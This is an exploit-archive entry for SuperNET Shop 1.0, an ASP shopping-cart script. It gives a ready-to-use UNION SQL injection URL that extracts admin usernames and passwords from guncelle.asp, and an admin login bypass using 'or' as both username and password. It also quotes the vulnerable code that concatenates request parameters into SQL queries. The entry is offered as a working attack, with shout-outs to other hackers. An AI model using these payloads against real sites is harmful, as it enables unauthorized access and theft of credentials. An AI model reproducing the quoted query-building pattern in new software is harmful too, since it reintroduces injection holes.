[] NeoSense

SuperNET Shop 1.0 - SQL Injection

Author: U238
type: webapps
platform: asp
port: 
date_added: 2008-04-07 
date_updated:  
verified: 1 
codes: OSVDB-52110;CVE-2008-6204;OSVDB-52109;OSVDB-52108 
tags: 
aliases:  
screenshot_url:  
application_url: 

-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_

SuperNET Shop v1.0  Remote SQL İnjection Vulnerability

Discovered By : U238 (ugur238)


webpage : ugur238.org (the end)


mail : setuid.noexec0x1@hotmail.com

>From : Turkey - Erzincan


Script : http://www.aspindir.com/indir.asp?ID=2

Script (alternativ) : http://rapidshare.de/files/39062184/supershop.zip.html

-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-

Exploit:

localhost:2222/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin


Error File : guncelle.asp


Error Code :

line - id = Request.QueryString("id")

line - SQL_L = "Select * from products WHERE id =" &id


Admin Panel : target/secure/admin



-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-

Admin Panel Bypass Exploit :


Error File :

giris.asp


Error Code :

Sorgu="select * from admin where KullaniciAdi = '" & request.form("kulad") & "' and Sifre = '" & Request.form("sifre") & "'"
Rs.Open Sorgu, Baglanti, 1, 3

------------------------

secure/admin/default.asp

username : 'or'

password : 'or'


Ye34h lets see you now admin panell ; )



*/ Greatz : The_BekiR  - ZeberuS  - ka0x - nettoxic - fahn - str0ke


MUSTAFA KEMAL ATATURK -  ATAM İZİNDEYIZ

                                                                    /*

# milw0rm.com [2008-04-08]